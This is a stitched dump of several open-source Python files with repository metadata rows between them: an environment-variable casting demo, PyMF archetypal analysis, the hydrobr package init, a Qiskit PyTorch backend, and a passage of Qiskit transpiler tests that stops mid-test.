print(env['FOO', tuple]) # => (-1)
print(env['FOO', list]) # => [-1]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = 12.34
print(env['FOO']) # => '12.34'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 12
print(env['FOO', float]) # => 12.34
print(env['FOO', str]) # => '12.34'
print(env['FOO', tuple]) # => (12.34)
print(env['FOO', list]) # => [12.34]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = '12.34'
print(env['FOO']) # => '12.34'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 12
print(env['FOO', float]) # => 12.34
print(env['FOO', str]) # => '12.34'
print(env['FOO', tuple]) # => (12.34)
print(env['FOO', list]) # => [12.34]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = -12.34
print(env['FOO']) # => '-12.34'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => -12
print(env['FOO', float]) # => -12.34
print(env['FOO', str]) # => '-12.34'
print(env['FOO', tuple]) # => (-12.34)
print(env['FOO', list]) # => [-12.34]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = '-12.34'
print(env['FOO']) # => '-12.34'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => -12
print(env['FOO', float]) # => -12.34
print(env['FOO', str]) # => '-12.34'
print(env['FOO', tuple]) # => (-12.34)
print(env['FOO', list]) # => [-12.34]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = 'foo bar baz 1 2 3'
print(env['FOO']) # => 'foo bar baz 1 2 3'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 123
print(env['FOO', float]) # => 123.0
print(env['FOO', str]) # => 'foo bar baz 1 2 3'
print(env['FOO', tuple]) # => ('foo bar baz 1 2 3')
print(env['FOO', list]) # => ['foo bar baz 1 2 3']
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = 'foo,bar,baz,1,2,3'
print(env['FOO']) # => 'foo,bar,baz,1,2,3'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 123
print(env['FOO', float]) # => 123.0
print(env['FOO', str]) # => 'foo,bar,baz,1,2,3'
print(env['FOO', tuple]) # => ('foo', 'bar', 'baz')
print(env['FOO', list]) # => ['foo', 'bar', 'baz']
print(env['FOO', dict]) # => {0: 'foo', 1: 'bar', 2: 'baz'}
print('---')
env['FOO'] = ('foo', 'bar', 'baz', 1, 2, 3)
print(env['FOO']) # => '(foo,bar,baz,1,2,3)'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 123
print(env['FOO', float]) # => 123.0
print(env['FOO', str]) # => '(foo,bar,baz,1,2,3)'
print(env['FOO', tuple]) # => ('foo', 'bar', 'baz')
print(env['FOO', list]) # => ['foo', 'bar', 'baz', 1, 2, 3]
print(env['FOO', dict]) # => {} # TODO: {0: 'foo', 1: 'bar', 2: 'baz', 3: 1, 4: 2, 5: 3}
print('---')
env['FOO'] = ['foo', 'bar', 'baz', 1, 2, 3]
print(env['FOO']) # => '[foo,bar,baz,1,2,3]'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 123
print(env['FOO', float]) # => 123.0
print(env['FOO', str]) # => '[foo, bar, baz, 1, 2, 3]'
print(env['FOO', tuple]) # => ('foo', 'bar', 'baz', 1, 2, 3)
print(env['FOO', list]) # => ['foo', 'bar', 'baz', 1, 2, 3]
print(env['FOO', dict]) # => {} # TODO: {0: 'foo', 1: 'bar', 2: 'baz', 3: 1, 4: 2, 5: 3}
print('---')
env['FOO'] = {'foo': 1, 'bar': 2, 'baz': 3}
print(env['FOO']) # => '{foo:1,bar:2,baz:3}' # REVIEW: handle nested json
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 123
print(env['FOO', float]) # => 123.0
print(env['FOO', str]) # => '{foo: 1, bar: 2, baz: 3}'
print(env['FOO', tuple]) # => ({0: 'foo', 1: 'bar', 2: 'baz', 3: 1, 4: 2, 5: 3})
print(env['FOO', list]) # => [{0: 'foo', 1: 'bar', 2: 'baz', 3: 1, 4: 2, 5: 3}]
print(env['FOO', dict]) # => {'foo': 1, 'bar': 2, 'baz': 3}
# etc.
print('---')
env.inspect()
print('---')
env.print()
print('---')
| 23.885417 | 89 | 0.490188 |
9b4e9bca9ed86f17e168c1870733f3c9e6cd62fb | 4,743 | py | Python | msaf/pymf/aa.py | m-tian/msaf-copy | 614bba6686fd0abf3c5866b92d78fccf5186b6a3 | [
"MIT"
] | 1 | 2020-02-17T08:14:16.000Z | 2020-02-17T08:14:16.000Z | msaf/pymf/aa.py | m-tian/msaf-copy | 614bba6686fd0abf3c5866b92d78fccf5186b6a3 | [
"MIT"
] | null | null | null | msaf/pymf/aa.py | m-tian/msaf-copy | 614bba6686fd0abf3c5866b92d78fccf5186b6a3 | [
"MIT"
] | 1 | 2020-02-14T08:57:35.000Z | 2020-02-14T08:57:35.000Z | #!/usr/bin/python
#
# Copyright (C) Christian Thurau, 2010.
# Licensed under the GNU General Public License (GPL).
# http://www.gnu.org/licenses/gpl.txt
"""
PyMF Archetypal Analysis [1]
AA: class for Archetypal Analysis
[1] Cutler, A. Breiman, L. (1994), "Archetypal Analysis", Technometrics 36(4),
338-347.
"""
import numpy as np
from dist import vq
from cvxopt import solvers, base
from svd import pinv
from nmf import NMF
__all__ = ["AA"]
class AA(NMF):
"""
AA(data, num_bases=4)
Archetypal Analysis. Factorize a data matrix into two matrices s.t.
F = | data - W*H | = | data - data*beta*H| is minimal. H and beta
are restricted to convexity (beta >=0, sum(beta, axis=1) = [1 .. 1]).
Factorization is solved via an alternating least squares optimization
using the quadratic programming solver from cvxopt.
Parameters
----------
data : array_like, shape (_data_dimension, _num_samples)
the input data
num_bases: int, optional
Number of bases to compute (column rank of W and row rank of H).
4 (default)
Attributes
----------
W : "data_dimension x num_bases" matrix of basis vectors
H : "num bases x num_samples" matrix of coefficients
beta : "num_bases x num_samples" matrix of basis vector coefficients
(for constructing W s.t. W = beta * data.T )
ferr : frobenius norm (after calling .factorize())
Example
-------
Applying AA to some rather stupid data set:
>>> import numpy as np
>>> from aa import AA
>>> data = np.array([[1.0, 0.0, 2.0], [0.0, 1.0, 1.0]])
Use 2 basis vectors -> W shape(data_dimension, 2).
>>> aa_mdl = AA(data, num_bases=2)
Set number of iterations to 5 and start computing the factorization.
>>> aa_mdl.factorize(niter=5)
The basis vectors are now stored in aa_mdl.W, the coefficients in aa_mdl.H.
To compute coefficients for an existing set of basis vectors simply copy W
to aa_mdl.W, and set compute_w to False:
>>> data = np.array([[1.5], [1.2]])
>>> W = np.array([[1.0, 0.0], [0.0, 1.0]])
>>> aa_mdl = AA(data, num_bases=2)
>>> aa_mdl.W = W
>>> aa_mdl.factorize(niter=5, compute_w=False)
The result is a set of coefficients aa_mdl.H, s.t. data = W * aa_mdl.H.
"""
# set cvxopt options
solvers.options['show_progress'] = False
def init_h(self):
self.H = np.random.random((self._num_bases, self._num_samples))
self.H /= self.H.sum(axis=0)
def init_w(self):
self.beta = np.random.random((self._num_bases, self._num_samples))
self.beta /= self.beta.sum(axis=0)
        self.W = np.random.random((self._data_dimension, self._num_bases))
def update_h(self):
""" alternating least squares step, update H under the convexity
constraint """
def update_single_h(i):
""" compute single H[:,i] """
# optimize alpha using qp solver from cvxopt
FA = base.matrix(np.float64(np.dot(-self.W.T, self.data[:,i])))
al = solvers.qp(HA, FA, INQa, INQb, EQa, EQb)
self.H[:,i] = np.array(al['x']).reshape((1, self._num_bases))
EQb = base.matrix(1.0, (1,1))
# float64 required for cvxopt
HA = base.matrix(np.float64(np.dot(self.W.T, self.W)))
INQa = base.matrix(-np.eye(self._num_bases))
INQb = base.matrix(0.0, (self._num_bases,1))
EQa = base.matrix(1.0, (1, self._num_bases))
for i in xrange(self._num_samples):
update_single_h(i)
def update_w(self):
""" alternating least squares step, update W under the convexity
constraint """
def update_single_w(i):
""" compute single W[:,i] """
# optimize beta using qp solver from cvxopt
FB = base.matrix(np.float64(np.dot(-self.data.T, W_hat[:,i])))
be = solvers.qp(HB, FB, INQa, INQb, EQa, EQb)
self.beta[i,:] = np.array(be['x']).reshape((1, self._num_samples))
# float64 required for cvxopt
HB = base.matrix(np.float64(np.dot(self.data[:,:].T, self.data[:,:])))
EQb = base.matrix(1.0, (1, 1))
W_hat = np.dot(self.data, pinv(self.H))
INQa = base.matrix(-np.eye(self._num_samples))
INQb = base.matrix(0.0, (self._num_samples, 1))
EQa = base.matrix(1.0, (1, self._num_samples))
for i in xrange(self._num_bases):
update_single_w(i)
self.W = np.dot(self.beta, self.data.T).T
if __name__ == "__main__":
import doctest
doctest.testmod()
| 34.122302 | 82 | 0.596669 |
7f8d4e4c6a7a1ab2094cebef82e0846148a1419d | 263 | py | Python | hydrobr/__init__.py | wallissoncarvalho/hydrobr | 0374d6352a2d361486d41c6713059ddc4bdd30db | [
"BSD-3-Clause"
] | 17 | 2020-07-02T23:28:24.000Z | 2021-03-10T12:25:01.000Z | hydrobr/__init__.py | LucasAgro/hydrobr | f84cf02998ab3db693d925e4c6f89b274595b117 | [
"BSD-3-Clause"
] | 8 | 2020-07-07T14:12:45.000Z | 2020-07-07T20:03:11.000Z | hydrobr/__init__.py | LucasAgro/hydrobr | f84cf02998ab3db693d925e4c6f89b274595b117 | [
"BSD-3-Clause"
] | 4 | 2021-04-29T15:39:19.000Z | 2021-10-29T18:30:50.000Z | """HydroBr is an open-source package to work with Brazilian hydrometeorological time series."""
__version__ = '0.1.1'
from hydrobr import get_data
from hydrobr.graphics import Plot
from hydrobr.preprocessing import PreProcessing
from hydrobr.save import SaveAs
| 29.222222 | 95 | 0.813688 |
f2b753c22e58acc6a9534dc7151218f5f66bc851 | 11,678 | py | Python | phi/torch/torch_backend.py | tum-pbs/CG-Solver-in-the-Loop | f6cb28819c7559d4afa972abc02f810c0c81515f | [
"MIT"
] | 13 | 2020-12-05T13:40:59.000Z | 2021-12-26T09:58:59.000Z | phi/torch/torch_backend.py | tum-pbs/CG-Solver-in-the-Loop | f6cb28819c7559d4afa972abc02f810c0c81515f | [
"MIT"
] | null | null | null | phi/torch/torch_backend.py | tum-pbs/CG-Solver-in-the-Loop | f6cb28819c7559d4afa972abc02f810c0c81515f | [
"MIT"
] | null | null | null | import warnings
import numpy as np
import torch
import torch.nn.functional as torchf
from phi.backend.backend import Backend
class TorchBackend(Backend):
def __init__(self):
Backend.__init__(self, 'PyTorch')
def is_tensor(self, x):
return isinstance(x, (torch.Tensor, ComplexTensor))
def as_tensor(self, x):
if self.is_tensor(x):
return x
if isinstance(x, np.ndarray):
if x.dtype == np.float64:
x = x.astype(np.float32)
return torch.from_numpy(x)
if isinstance(x, (tuple, list)):
try:
return torch.tensor(x)
except ValueError: # there may be Tensors inside the list
components = [self.as_tensor(c) for c in x]
return torch.stack(components, dim=0)
return torch.tensor(x)
def copy(self, tensor, only_mutable=False):
return torch.clone(tensor)
def equal(self, x, y):
return x == y
def random_uniform(self, shape):
return torch.rand(shape)
def stack(self, values, axis=0):
return torch.stack(values, dim=axis)
def concat(self, values, axis):
return torch.cat(values, dim=axis)
def pad(self, value, pad_width, mode='constant', constant_values=0):
mode = mode.lower()
if mode == 'wrap':
warnings.warn("'wrap' is deprecated, use 'circular' instead", DeprecationWarning, stacklevel=2)
mode = 'circular'
if mode == 'constant':
pad = sum(pad_width[::-1], [] if isinstance(pad_width, list) else ())
return torchf.pad(value, pad, mode=mode, value=constant_values) # constant, reflect, replicate, circular
if mode == 'symmetric':
warnings.warn("mode 'symmetric' is not supported by PyTorch. Defaults to 'replicate'.")
mode = 'replicate'
value = channels_first(value)
reversed_axis_pad = pad_width[1:-1][::-1]
pad = sum(reversed_axis_pad, [] if isinstance(pad_width, list) else ())
result = torchf.pad(value, pad, mode=mode, value=constant_values) # constant, reflect, replicate, circular
result = channels_last(result)
return result
def reshape(self, value, shape):
return torch.reshape(value, shape)
def sum(self, value, axis=None, keepdims=False):
value = self.as_tensor(value)
if axis is None:
axis = range(len(value.shape))
return torch.sum(value, dim=axis, keepdim=keepdims)
def prod(self, value, axis=None):
return torch.prod(value, dim=axis)
def divide_no_nan(self, x, y):
result = self.as_tensor(x) / self.as_tensor(y)
return torch.where(y == 0, torch.zeros_like(result), result)
def where(self, condition, x=None, y=None):
return torch.where(condition, x, y)
def mean(self, value, axis=None, keepdims=False):
return torch.mean(value, dim=axis, keepdim=keepdims)
def py_func(self, func, inputs, Tout, shape_out, stateful=True, name=None, grad=None):
raise NotImplementedError()
def resample(self, inputs, sample_coords, interpolation='linear', boundary='constant'):
inputs = channels_first(self.as_tensor(inputs))
sample_coords = self.as_tensor(sample_coords)
# --- Interpolation ---
if interpolation.lower() == 'linear':
interpolation = 'bilinear'
elif interpolation.lower() == 'nearest':
interpolation = 'nearest'
else:
raise NotImplementedError(interpolation)
# --- Boundary ---
if boundary == 'zero' or boundary == 'constant':
boundary = 'zeros'
elif boundary == 'replicate':
boundary = 'border'
elif boundary == 'circular':
shape = self.to_float(inputs.shape[2:])
sample_coords = torch.fmod(sample_coords, shape)
inputs = torchf.pad(inputs, [0, 1] * (len(inputs.shape)-2), mode='circular')
boundary = 'zeros'
else:
raise NotImplementedError(boundary)
resolution = torch.Tensor(self.staticshape(inputs)[2:])
sample_coords = 2 * sample_coords / (resolution-1) - 1
sample_coords = torch.flip(sample_coords, dims=[-1])
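        # grid_sample expects sample points normalized to [-1, 1] with the
        # last axis ordered (x, y[, z]); hence the rescale and flip above.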
result = torchf.grid_sample(inputs, sample_coords, mode=interpolation, padding_mode=boundary) # can cause segmentation violation if NaN or inf are present
result = channels_last(result)
return result
def range(self, start, limit=None, delta=1, dtype=None):
raise NotImplementedError()
def zeros_like(self, tensor):
return torch.zeros_like(tensor)
def ones_like(self, tensor):
return torch.ones_like(tensor)
def dot(self, a, b, axes):
raise NotImplementedError()
def matmul(self, A, b):
if isinstance(A, torch.sparse.FloatTensor):
result = torch.sparse.mm(A, torch.transpose(b, 0, 1))
return torch.transpose(result, 0, 1)
raise NotImplementedError()
def while_loop(self, cond, body, loop_vars, shape_invariants=None, parallel_iterations=10, back_prop=True, swap_memory=False, name=None, maximum_iterations=None):
i = 0
while cond(*loop_vars):
            if maximum_iterations is not None and i == maximum_iterations:
                break
loop_vars = body(*loop_vars)
i += 1
return loop_vars
def abs(self, x):
return torch.abs(x)
def sign(self, x):
return torch.sign(x)
def round(self, x):
return torch.round(x)
def ceil(self, x):
return torch.ceil(x)
def floor(self, x):
return torch.floor(x)
def max(self, x, axis=None):
if axis is None:
return torch.max(x)
        return torch.max(x, dim=axis)[0]  # values only; torch also returns indices
def min(self, x, axis=None):
if axis is None:
return torch.min(x)
        return torch.min(x, dim=axis)[0]  # values only; torch also returns indices
def maximum(self, a, b):
b = self.as_tensor(b)
return torch.max(a, other=b)
def minimum(self, a, b):
return torch.min(a, other=b)
def with_custom_gradient(self, function, inputs, gradient, input_index=0, output_index=None, name_base='custom_gradient_func'):
return function(*inputs) # ToDo
def sqrt(self, x):
return torch.sqrt(x)
def exp(self, x):
return torch.exp(x)
def conv(self, tensor, kernel, padding='same'):
tensor = self.as_tensor(tensor)
kernel = self.as_tensor(kernel)
if padding.lower() == 'valid':
padding = 0
elif padding.lower() == 'same':
shape = kernel.shape
padding = sum([[d//2, (d+1)//2] for d in shape], [])
else:
raise ValueError(padding)
tensor = channels_first(tensor)
kernel = kernel.permute((-2, -1) + tuple(range(len(kernel.shape)-2)))
convf = {3: torchf.conv1d, 4: torchf.conv2d, 5: torchf.conv3d}[len(tensor.shape)]
result = convf(tensor, kernel, padding=padding)
result = channels_last(result)
return result
def expand_dims(self, a, axis=0, number=1):
for _ in range(number):
a = torch.unsqueeze(a, dim=axis)
return a
def shape(self, tensor):
return tensor.shape
def staticshape(self, tensor):
return tuple(tensor.shape)
def to_float(self, x):
x = self.as_tensor(x)
return x.float()
def to_int(self, x, int64=False):
x = self.as_tensor(x)
        return x.long() if int64 else x.int()
def to_complex(self, x):
x = self.as_tensor(x)
return ComplexTensor(self.stack([x, torch.zeros_like(x)], -1))
def gather(self, values, indices):
raise NotImplementedError()
def gather_nd(self, values, indices):
raise NotImplementedError()
def unstack(self, tensor, axis=0, keepdims=False):
unstacked = torch.unbind(tensor, dim=axis)
if keepdims:
unstacked = [self.expand_dims(c, axis=axis) for c in unstacked]
return unstacked
def std(self, x, axis=None, keepdims=False):
raise NotImplementedError()
def boolean_mask(self, x, mask):
raise NotImplementedError()
def isfinite(self, x):
raise NotImplementedError()
def scatter(self, points, indices, values, shape, duplicates_handling='undefined'):
raise NotImplementedError()
def any(self, boolean_tensor, axis=None, keepdims=False):
raise NotImplementedError()
def all(self, boolean_tensor, axis=None, keepdims=False):
raise NotImplementedError()
def fft(self, x):
if not isinstance(x, ComplexTensor):
x = self.to_complex(x)
rank = len(x.shape) - 2
x = channels_first(x).tensor
k = torch.fft(x, rank)
k = ComplexTensor(k)
k = channels_last(k)
return k
def ifft(self, k):
if not isinstance(k, ComplexTensor):
k = self.to_complex(k)
rank = len(k.shape) - 2
k = channels_first(k)
x = torch.ifft(k.tensor, rank)
x = ComplexTensor(x)
x = channels_last(x)
return x
def imag(self, complex):
if isinstance(complex, ComplexTensor):
return complex.imag
else:
if isinstance(complex, np.ndarray):
complex = np.imag(complex)
return torch.zeros_like(self.as_tensor(complex))
def real(self, complex):
if isinstance(complex, ComplexTensor):
return complex.real
else:
if isinstance(complex, np.ndarray):
complex = np.real(complex)
return self.as_tensor(complex)
def cast(self, x, dtype):
if dtype == np.float32:
return self.to_float(x)
if dtype == np.int32:
return self.to_int(x)
if dtype == np.int64:
return self.to_int(x, int64=True)
if dtype == np.complex64:
return self.to_complex(x)
raise NotImplementedError()
def sin(self, x):
return torch.sin(x)
def cos(self, x):
return torch.cos(x)
def dtype(self, array):
return array.dtype
def tile(self, value, multiples):
raise NotImplementedError()
def sparse_tensor(self, indices, values, shape):
indices_ = torch.transpose(torch.LongTensor(indices), 0, 1)
values_ = torch.FloatTensor(values)
return torch.sparse.FloatTensor(indices_, values_, shape)
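    # Illustrative use (hypothetical): a 2x2 sparse identity via
    #   TorchBackend().sparse_tensor(indices=[(0, 0), (1, 1)],
    #                                values=[1.0, 1.0], shape=(2, 2))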
def channels_first(x):
if isinstance(x, ComplexTensor):
x = x.tensor
y = x.permute(*((0, -2) + tuple(range(1, len(x.shape) - 2)) + (-1,)))
return ComplexTensor(y)
else:
return x.permute(*((0, -1) + tuple(range(1, len(x.shape) - 1))))
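# Shape sketch: for a channels-last batch (batch, h, w, c), or its complex
# counterpart with a trailing (re, im) axis, channels_first yields
# (batch, c, h, w); channels_last below is its inverse.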
def channels_last(x):
if isinstance(x, ComplexTensor):
x = x.tensor
x = x.permute((0,) + tuple(range(2, len(x.shape)-1)) + (1, -1))
return ComplexTensor(x)
else:
return x.permute((0,) + tuple(range(2, len(x.shape))) + (1,))
class ComplexTensor(object):
def __init__(self, tensor):
self.tensor = tensor
@property
def shape(self):
return self.tensor.shape[:-1]
@property
def real(self):
return self.tensor[...,0]
@property
def imag(self):
return self.tensor[...,1]
def __mul__(self, other):
math = TorchBackend()
real = self.real * math.real(other) - self.imag * math.imag(other)
imag = self.real * math.imag(other) + self.imag * math.real(other)
result = math.stack([real, imag], -1)
return ComplexTensor(result)
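# Minimal complex-arithmetic demo (illustrative addition, not part of the
# original module). ComplexTensor.__mul__ implements
# (a + bi)(c + di) = (ac - bd) + (ad + bc)i on the trailing real/imag dim.
if __name__ == '__main__':
    z = TorchBackend().to_complex(torch.ones(2, 4, 4, 3))  # imaginary part is zero
    w = z * z
    assert torch.equal(w.real, torch.ones(2, 4, 4, 3))
    assert torch.equal(w.imag, torch.zeros(2, 4, 4, 3))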
| 32.082418 | 166 | 0.599161 |
19c7f273191b9e1286d007807759d42f42b87daa | 42,109 | py | Python | test/python/compiler/test_transpiler.py | georgios-ts/qiskit-terra | 44e0a7ae967be2a95808f47b42ddef26704fc5b7 | [
"Apache-2.0"
] | null | null | null | test/python/compiler/test_transpiler.py | georgios-ts/qiskit-terra | 44e0a7ae967be2a95808f47b42ddef26704fc5b7 | [
"Apache-2.0"
] | 2 | 2020-02-20T19:44:42.000Z | 2020-09-25T20:34:17.000Z | test/python/compiler/test_transpiler.py | georgios-ts/qiskit-terra | 44e0a7ae967be2a95808f47b42ddef26704fc5b7 | [
"Apache-2.0"
] | null | null | null | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=no-member
"""Tests basic functionality of the transpile function"""
import io
import sys
import math
from logging import StreamHandler, getLogger
from unittest.mock import patch
from ddt import ddt, data, unpack
from test import combine # pylint: disable=wrong-import-order
import numpy as np
from qiskit.exceptions import QiskitError
from qiskit import BasicAer
from qiskit import QuantumRegister, ClassicalRegister, QuantumCircuit, pulse
from qiskit.circuit import Parameter, Gate
from qiskit.compiler import transpile
from qiskit.converters import circuit_to_dag
from qiskit.circuit.library import CXGate, U3Gate, U2Gate, U1Gate, RXGate, RYGate
from qiskit.test import QiskitTestCase, Path
from qiskit.test.mock import FakeMelbourne, FakeRueschlikon, FakeAlmaden
from qiskit.transpiler import Layout, CouplingMap
from qiskit.transpiler import PassManager
from qiskit.transpiler.exceptions import TranspilerError
from qiskit.transpiler.passes import BarrierBeforeFinalMeasurements, CXDirection
from qiskit.quantum_info import Operator
from qiskit.transpiler.passmanager_config import PassManagerConfig
from qiskit.transpiler.preset_passmanagers import level_0_pass_manager
@ddt
class TestTranspile(QiskitTestCase):
"""Test transpile function."""
def test_pass_manager_none(self):
"""Test passing the default (None) pass manager to the transpiler.
It should perform the default qiskit flow:
unroll, swap_mapper, cx_direction, cx_cancellation, optimize_1q_gates
and should be equivalent to using tools.compile
"""
qr = QuantumRegister(2, 'qr')
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[1], qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[1], qr[0])
coupling_map = [[1, 0]]
basis_gates = ['u1', 'u2', 'u3', 'cx', 'id']
backend = BasicAer.get_backend('qasm_simulator')
circuit2 = transpile(circuit, backend=backend, coupling_map=coupling_map,
basis_gates=basis_gates, pass_manager=None)
circuit3 = transpile(circuit, backend=backend, coupling_map=coupling_map,
basis_gates=basis_gates)
self.assertEqual(circuit2, circuit3)
def test_transpile_basis_gates_no_backend_no_coupling_map(self):
"""Verify transpile() works with no coupling_map or backend."""
qr = QuantumRegister(2, 'qr')
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
basis_gates = ['u1', 'u2', 'u3', 'cx', 'id']
circuit2 = transpile(circuit, basis_gates=basis_gates, optimization_level=0)
resources_after = circuit2.count_ops()
self.assertEqual({'u2': 2, 'cx': 4}, resources_after)
def test_transpile_non_adjacent_layout(self):
"""Transpile pipeline can handle manual layout on non-adjacent qubits.
circuit:
qr0:-[H]--.------------ -> 1
|
qr1:-----(+)--.-------- -> 2
|
qr2:---------(+)--.---- -> 3
|
qr3:-------------(+)--- -> 5
device:
0 - 1 - 2 - 3 - 4 - 5 - 6
| | | | | |
13 - 12 - 11 - 10 - 9 - 8 - 7
"""
qr = QuantumRegister(4, 'qr')
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[1], qr[2])
circuit.cx(qr[2], qr[3])
coupling_map = FakeMelbourne().configuration().coupling_map
basis_gates = FakeMelbourne().configuration().basis_gates
initial_layout = [None, qr[0], qr[1], qr[2], None, qr[3]]
new_circuit = transpile(circuit,
basis_gates=basis_gates,
coupling_map=coupling_map,
initial_layout=initial_layout)
for gate, qargs, _ in new_circuit.data:
if isinstance(gate, CXGate):
self.assertIn([x.index for x in qargs], coupling_map)
def test_transpile_qft_grid(self):
"""Transpile pipeline can handle 8-qubit QFT on 14-qubit grid.
"""
qr = QuantumRegister(8)
circuit = QuantumCircuit(qr)
for i, _ in enumerate(qr):
for j in range(i):
circuit.cp(math.pi / float(2 ** (i - j)), qr[i], qr[j])
circuit.h(qr[i])
coupling_map = FakeMelbourne().configuration().coupling_map
basis_gates = FakeMelbourne().configuration().basis_gates
new_circuit = transpile(circuit,
basis_gates=basis_gates,
coupling_map=coupling_map)
for gate, qargs, _ in new_circuit.data:
if isinstance(gate, CXGate):
self.assertIn([x.index for x in qargs], coupling_map)
def test_already_mapped_1(self):
"""Circuit not remapped if matches topology.
See: https://github.com/Qiskit/qiskit-terra/issues/342
"""
backend = FakeRueschlikon()
coupling_map = backend.configuration().coupling_map
basis_gates = backend.configuration().basis_gates
qr = QuantumRegister(16, 'qr')
cr = ClassicalRegister(16, 'cr')
qc = QuantumCircuit(qr, cr)
qc.cx(qr[3], qr[14])
qc.cx(qr[5], qr[4])
qc.h(qr[9])
qc.cx(qr[9], qr[8])
qc.x(qr[11])
qc.cx(qr[3], qr[4])
qc.cx(qr[12], qr[11])
qc.cx(qr[13], qr[4])
qc.measure(qr, cr)
new_qc = transpile(qc, coupling_map=coupling_map, basis_gates=basis_gates,
initial_layout=Layout.generate_trivial_layout(qr))
cx_qubits = [qargs for (gate, qargs, _) in new_qc.data if gate.name == "cx"]
cx_qubits_physical = [[ctrl.index, tgt.index] for [ctrl, tgt] in cx_qubits]
self.assertEqual(sorted(cx_qubits_physical),
[[3, 4], [3, 14], [5, 4], [9, 8], [12, 11], [13, 4]])
def test_already_mapped_via_layout(self):
"""Test that a manual layout that satisfies a coupling map does not get altered.
See: https://github.com/Qiskit/qiskit-terra/issues/2036
"""
basis_gates = ['u1', 'u2', 'u3', 'cx', 'id']
coupling_map = [[0, 1], [0, 5], [1, 0], [1, 2], [2, 1], [2, 3],
[3, 2], [3, 4], [4, 3], [4, 9], [5, 0], [5, 6],
[5, 10], [6, 5], [6, 7], [7, 6], [7, 8], [7, 12],
[8, 7], [8, 9], [9, 4], [9, 8], [9, 14], [10, 5],
[10, 11], [10, 15], [11, 10], [11, 12], [12, 7],
[12, 11], [12, 13], [13, 12], [13, 14], [14, 9],
[14, 13], [14, 19], [15, 10], [15, 16], [16, 15],
[16, 17], [17, 16], [17, 18], [18, 17], [18, 19],
[19, 14], [19, 18]]
q = QuantumRegister(6, name='qn')
c = ClassicalRegister(2, name='cn')
qc = QuantumCircuit(q, c)
qc.h(q[0])
qc.h(q[5])
qc.cx(q[0], q[5])
qc.p(2, q[5])
qc.cx(q[0], q[5])
qc.h(q[0])
qc.h(q[5])
qc.barrier(q)
qc.measure(q[0], c[0])
qc.measure(q[5], c[1])
initial_layout = [q[3], q[4], None, None, q[5], q[2], q[1], None, None, q[0],
None, None, None, None, None, None, None, None, None, None]
new_qc = transpile(qc, coupling_map=coupling_map,
basis_gates=basis_gates, initial_layout=initial_layout)
cx_qubits = [qargs for (gate, qargs, _) in new_qc.data
if gate.name == "cx"]
cx_qubits_physical = [[ctrl.index, tgt.index] for [ctrl, tgt] in cx_qubits]
self.assertEqual(sorted(cx_qubits_physical),
[[9, 4], [9, 4]])
def test_transpile_bell(self):
"""Test Transpile Bell.
        If everything is correct, a transpiled circuit should exist.
"""
backend = BasicAer.get_backend('qasm_simulator')
qubit_reg = QuantumRegister(2, name='q')
clbit_reg = ClassicalRegister(2, name='c')
qc = QuantumCircuit(qubit_reg, clbit_reg, name="bell")
qc.h(qubit_reg[0])
qc.cx(qubit_reg[0], qubit_reg[1])
qc.measure(qubit_reg, clbit_reg)
circuits = transpile(qc, backend)
self.assertIsInstance(circuits, QuantumCircuit)
def test_transpile_two(self):
"""Test transpile to circuits.
        If everything is correct, transpiled circuits should exist.
"""
backend = BasicAer.get_backend('qasm_simulator')
qubit_reg = QuantumRegister(2)
clbit_reg = ClassicalRegister(2)
qubit_reg2 = QuantumRegister(2)
clbit_reg2 = ClassicalRegister(2)
qc = QuantumCircuit(qubit_reg, clbit_reg, name="bell")
qc.h(qubit_reg[0])
qc.cx(qubit_reg[0], qubit_reg[1])
qc.measure(qubit_reg, clbit_reg)
qc_extra = QuantumCircuit(qubit_reg, qubit_reg2, clbit_reg, clbit_reg2, name="extra")
qc_extra.measure(qubit_reg, clbit_reg)
circuits = transpile([qc, qc_extra], backend)
self.assertIsInstance(circuits[0], QuantumCircuit)
self.assertIsInstance(circuits[1], QuantumCircuit)
def test_transpile_singleton(self):
"""Test transpile a single-element list with a circuit.
See https://github.com/Qiskit/qiskit-terra/issues/5260"""
backend = BasicAer.get_backend('qasm_simulator')
qubit_reg = QuantumRegister(2)
clbit_reg = ClassicalRegister(2)
qc = QuantumCircuit(qubit_reg, clbit_reg, name="bell")
qc.h(qubit_reg[0])
qc.cx(qubit_reg[0], qubit_reg[1])
qc.measure(qubit_reg, clbit_reg)
circuits = transpile([qc], backend)
self.assertEqual(len(circuits), 1)
self.assertIsInstance(circuits[0], QuantumCircuit)
def test_mapping_correction(self):
"""Test mapping works in previous failed case.
"""
backend = FakeRueschlikon()
qr = QuantumRegister(name='qr', size=11)
cr = ClassicalRegister(name='qc', size=11)
circuit = QuantumCircuit(qr, cr)
circuit.u(1.564784764685993, -1.2378965763410095, 2.9746763177861713, qr[3])
circuit.u(1.2269835563676523, 1.1932982847014162, -1.5597357740824318, qr[5])
circuit.cx(qr[5], qr[3])
circuit.p(0.856768317675967, qr[3])
circuit.u(-3.3911273825190915, 0.0, 0.0, qr[5])
circuit.cx(qr[3], qr[5])
